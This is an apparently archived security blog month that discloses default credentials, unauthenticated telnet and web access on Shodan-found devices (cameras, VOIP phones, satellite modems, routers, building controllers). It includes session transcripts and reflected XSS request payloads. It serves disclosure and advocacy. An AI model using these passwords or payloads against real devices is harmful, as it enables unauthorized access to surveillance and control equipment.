Archive for October, 2013

Verint Nextiva S1900e Series Default Unauthenticated Access

October 31, 2013

Verint Nextiva S1900e series devices (Shodan search) allow unauthenticated access to HTTP and telnet by default. According to the manual:

Designed for video monitoring and surveillance over IP networks, the Nextiva S1900e series is a highly compact, single-input or -output edge device.

Web interface:

verint1

verint2

Telnet:

df:/home/df # telnet 1.2.3.4
Trying 1.2.3.4…
Connected to 1.2.3.4.
Escape character is ‘^]’.

***********************************************************
* Verint Video Solutions S1970e VRU – 1.2.3.4 *
***********************************************************
Main Menu
———————————————————–
Menus:
1) Serial Port
2) Access Management
3) System Status
4) Network
5) Ethernet Communication
6) Advanced

Commands:
s) Save Settings
r) Reboot System
l) Load Default Configuration
q) Quit
***********************************************************
Command: !”‘^]
telnet> close
Connection closed.
df:/home/df #

Advertisements

Grandstream GXP VOIP Phones Default Credentials

October 30, 2013

Ran across a saved Shodan search for Grandstream GXP VOIP phones and a note about the defaults. They just use a password for authentication not account name and ‘admin’ works for administrator while ‘123’ works for user level. Many people seem to forget to change the default user account! The note says it works for “high-end and low-end: 1405, 1200, 2100, 280, etc.” I quickly tested these models:
GXP280 (HW0.3B)
GXP1200 (HW0.2B)
GXP2000 (HW1.1A)
GXP2000 (HW1.2B)
GXP2000 (HW2.2A)
GXP2010 (HW0.2C)

The login screen with just a password prompt:

grandstream1

User level access gives you the status and basic settings page but that allows you to reboot the device as well:

grandstream2

grandstream3

Comtech CDM-570/570L Satellite Modem Multiple Defaults

October 29, 2013

The Comtech CDM-570/570L Satellite Modem (Shodan search) has several defaults. According to the manual:

Read Community default = public
Write Community default = private
Trap Community default = comtech

From the saved Shodan search the notes also said these work. The manual shows the first one:

Default Name/Passwords are:
Admin comtech/comtech
Read/Write opcenter/1234
Read Only monitor/1234

LC3000 Laundry Reader Default Telnet Password

October 28, 2013

Blackboard Inc. makes a product called LC3000 Laundry Reader that may not be produced anymore. According to a manual though it has a default password for the telnet interface which gets you access to interesting functions:

Log in using the default password: IPrdr4U.
The password is case sensitive. Consider changing the password.

df:/tmp # telnet 1.2.3.4
Trying 1.2.3.4…
Connected to 1.2.3.4.
Escape character is ‘^]’.

Blackboard LC3000 Configuration

Enter Password > *******

LC3000 V4.9

Command Reference –

config – Configure network parameters
showconfig – Display current configuration
status – Display reader status
ping – Ping another IP device
netstats – Display network statistics
netclear – Clear network statistics counters
password – Change config utility password
ipreboot – Reboot reader
exit – Log out of session

Type command, followed by ‘Enter’ key > showconfig

Model: LC3000

Serial Number: 5016014
MAC Address: 08-00-6a-0e-3e-8e

Communication Mode: IP

DHCP Config: Enabled
IP Address: 1.2.3.4 (via DHCP)
Subnet Mask: 255.255.255.0 (via DHCP)
Default Router/Gateway: 1.2.3.1 (via DHCP)
NP/Host IP Address: 1.2.3.4 (local)
Telnet Access: Enabled

Comment:

Volume: 6
Contrast 10
Backlight: high
Service card access: Enabled

Type command, followed by ‘Enter’ key > status

LC3000 Status:

Last power-up: 05/25/13 16:14:56
Current Time: 10/26/13 16:10:07

On-Line

Last communicated with NP/Host 6 seconds ago.

Software Versions:
LC3000IP V4.9
LCM20 V1.0
LWI V1.2

Type command, followed by ‘Enter’ key > netstats

LC3000 Network Statistics:

Last power-up: 05/25/13 16:14:56
Network counters last cleared: 05/25/13 16:14:56

Link: 100 Mbps Half duplex

Transmit Statistics:
Frames Ok………. 300038 Deferred…………. 79
Single Collisions.. 10 Late Collisions…… 0
Multiple Collisions 37 Excessive Collisions. 0
Underrun……….. 0 Carrier Lost……… 0

Receive Statistics:
Frames Ok………. 4805569 Dropped Frames……. 0
Alignment Error…. 0 CRC Error………… 0
Overrun………… 1902 Truncated………… 0
Max Frames Length.. 0 Babbling…………. 0
Bus Error………. 0

Type command, followed by ‘Enter’ key > exit

Exiting Configuration Utility . . .

Connection closed by foreign host.
df:/tmp #

Sunday Shodan Defaults

October 27, 2013

Just a few more defaults while poking around Shodan!

The Technicolor TG582n has a default according to the manual:

The default password is either blank or the ACCESS KEY printed on the label of your Technicolor Gateway. This depends on the settings chosen by your Service Provider


The Adtran ATLAS 550 manual shows it has a default. (Shodan search)

After connecting to the unit and beginning a terminal session, a login screen appears. The default password for the ATLAS 550 is (all lowercase) password.


MayGion IP cameras (Shodan search) have a default admin account of admin:admin.


Vivotek network cameras (Shodan search) according to the manual have a default persistent administrator account name and no password protection by default:

By default, your Network Camera is not password-protected.
The administrator account name is “root”, which is permanent and can not be deleted.


According to the manual Siemens OpenStage 40 and OpenStage 60 phones (Shodan search) have a default password for the administration menu on the phone but it also works for the web interface: 123456

ARESCOM NetDSL Routers Unauthenticated Telnet Access

October 25, 2013

From an older saved Shodan search it looks like ARESCOM routers don’t require authentication for telnet! You can do a lot of commands including reboot, disconnect from the ISP and more!

Confirmed:
Model: NDS1260HE-TLI (Hardware) Version: 6.0.27 (Software version)
Model: ND1060VE-TLI (Hardware) Version: 5.3.21B (Software version)

df:~ # telnet 1.2.3.4
Trying 1.2.3.4…
Connected to 1.2.3.4.
Escape character is ‘^]’.

NDS1260HE-TLI Copyright by ARESCOM 2002

Login Success!
NetDSL>?

******* Console Help Menu *******
Available Command:

add add objects in table
connect start the connection
delete delete objects in table
disconnect disconnect modem connection
help display this menu again
quit quit the system
reboot reboot the router
reset reset the configuration, and reboot
save save the configuration
set set system parameters
show display system status
test system test
upgrade upgrade the firmware via FTP, TFTP and XMODEM

NetDSL>show sysinfo

Vendor: Arescom
Model: NDS1260HE-TLI (Hardware)
Version: 6.0.27 (Software version)
UpTime: 0293:28 (hh:mm)

NetDSL>

Cortexa Web Interface Default Credentials

October 24, 2013

Cortexa makes a smart home control system (Shodan search). According to the manual the web interface has a default password:

You should now be at this login page. Enter admin in the User Name field, and cortexa (the default password) in lowercase letters in the Password field. Optionally click on the box to remember this password for subsequent logins with this user name. Then click OK.

CSO article about default passwords!

October 23, 2013

A few days ago Steve Ragan contacted me after my blog about why ICS-CERT is wrong about default passwords. I thought it was going to be a short article just covering my comments but he ended up talking to a lot of other researchers about the issue and they all appear to agree with me! The article is titled “Changeable default passwords are not seen as vulnerabilities by ICS-CERT, but should they be?” and hopefully brings the issue of defaults to more people!

IQ3 Trend LAN Controller – Multiple Reflected XSS

October 23, 2013

Trend Control Systems makes a series of products called IQ3 controllers running IQ3 Excite software (Manual). From a Shodan search I saw I poked at one without authentication. By default you are given system guest access which lets you see the status of components. Some of these pages allow for cross site scripting (CVE-2013-78004).

1. K.htm ovrideStart Parameter Reflected XSS

GET /K.htm?ovrideStart=dfdfdf&ovrideStart=dfdfdf”><alert>(‘DF’)</script>&ovrideStart=0 HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.16
Host: 1.2.3.4
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://1.2.3.4/K.htm?ovrideStart=df&ovrideStart=0
Proxy-Connection: Keep-Alive

iq3-xss1

2. Z.htm ovrideStart Parameter Reflected XSS

In addition there are 10 sub pages in the format Z#(W).htm for each of 10 zones. Each of these pages have a reflected XSS in the same parameter:

http://1.2.3.4/Z2(W).htm?ovrideTitle:d=Normal%20Week”><alert>(‘DF’)</script>

3. P.htm ovrideStart Parameter Reflected XSS

4. S.htm ovrideStart Parameter Reflected XSS

WampServer phpinfo() Information Disclosure

October 22, 2013

Ran across a saved Shodan search for WampServer, a development platform. Without authentication it gives up all the phpinfo() information from a link on the main page:

wampserver-1

wampserver-2